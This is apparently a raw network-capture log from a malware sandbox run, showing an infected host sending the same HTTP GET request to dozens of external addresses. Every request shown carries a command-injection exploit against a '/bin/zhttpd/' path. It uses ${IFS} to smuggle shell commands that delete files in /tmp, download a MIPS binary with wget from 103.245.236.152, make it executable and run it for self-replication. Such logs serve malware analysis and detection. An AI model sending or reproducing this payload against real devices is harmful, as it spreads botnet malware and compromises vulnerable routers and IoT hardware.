                                            Jan 14, 2024 15:50:51.655213118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7652192.168.2.2340200181.214.103.78443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655240059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7653192.168.2.2339010173.247.242.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655245066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7654192.168.2.234639866.212.92.47443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655265093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7655192.168.2.234263625.186.23.5443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655303955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7656192.168.2.2344848216.10.103.11443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655313015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7657192.168.2.2347508195.10.16.107443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655320883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7658192.168.2.2338116200.238.153.98443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655339956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7659192.168.2.2346762202.249.212.230443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655409098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7660192.168.2.23454948.232.107.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655430079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7661192.168.2.2345378106.88.143.55443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655463934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7662192.168.2.234137224.147.88.40443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655488968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7663192.168.2.233326287.167.144.229443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655509949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7664192.168.2.2354618167.228.21.44443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655554056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7665192.168.2.23464125.180.172.12443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655575991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7666192.168.2.2351698133.99.8.89443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655596018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7667192.168.2.2355384222.228.166.147443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655633926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7668192.168.2.2360382151.155.148.145443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655642986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7669192.168.2.2348512153.198.165.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655654907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7670192.168.2.234179625.56.92.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655679941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7671192.168.2.2337102179.118.8.243443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655702114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7672192.168.2.2346470209.154.233.97443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655756950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7673192.168.2.2333694172.15.221.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655756950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7674192.168.2.2345450141.197.148.113443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655767918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7675192.168.2.2333762158.63.160.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655828953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7676192.168.2.2354968112.5.234.68443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655838013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7677192.168.2.233475652.54.92.250443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655869961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7678192.168.2.2334844142.155.113.251443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655895948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7679192.168.2.2358100151.31.70.160443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655934095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7680192.168.2.2359242221.174.79.118443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655942917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7681192.168.2.2341270119.228.190.120443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.655983925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7682192.168.2.2353194157.36.28.38443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656004906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7683192.168.2.2345036167.228.12.200443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656018019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7684192.168.2.2342062154.66.54.71443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656075001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7685192.168.2.234350243.98.9.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656091928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7686192.168.2.233512480.60.75.73443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656115055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7687192.168.2.2335470222.218.69.46443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656137943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7688192.168.2.2349010136.255.208.119443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656162024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7689192.168.2.234697291.244.143.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656208992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7690192.168.2.235117252.22.3.121443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656234026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7691192.168.2.235966846.79.227.188443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656250954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7692192.168.2.2337090186.212.78.117443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656270027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7693192.168.2.233485618.68.210.239443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656296015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7694192.168.2.2359120191.106.126.18443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656338930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7695192.168.2.2346708209.224.253.234443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656348944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7696192.168.2.2347820112.55.159.102443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656377077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7697192.168.2.2347880113.200.241.45443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656415939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7698192.168.2.234974867.153.19.49443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656440973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7699192.168.2.235968013.175.246.245443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656474113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7700192.168.2.2342622197.2.131.231443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656495094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7701192.168.2.2342752154.148.57.155443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656522036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7702192.168.2.2347240131.121.111.198443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656563044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7703192.168.2.233690464.179.149.37443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:51.656604052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7704192.168.2.235568225.161.80.248443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668275118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7705192.168.2.2360114169.115.122.108443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668406963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7706192.168.2.233675091.244.150.110443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668450117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7707192.168.2.2338342109.132.206.177443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668450117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7708192.168.2.2352120179.85.172.154443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668452978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7709192.168.2.2335038108.86.12.181443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668483019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7710192.168.2.2348178179.139.230.82443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668497086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7711192.168.2.2346676199.241.49.138443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668534040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7712192.168.2.234984268.131.167.255443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668548107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7713192.168.2.235167624.152.40.22443
                                            TimestampBytes transferredDirectionData
                                            Jan 14, 2024 15:50:52.668584108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7714192.168.2.2336340141.210.199.184443
                                            TimestampBytes transferredDirectionData
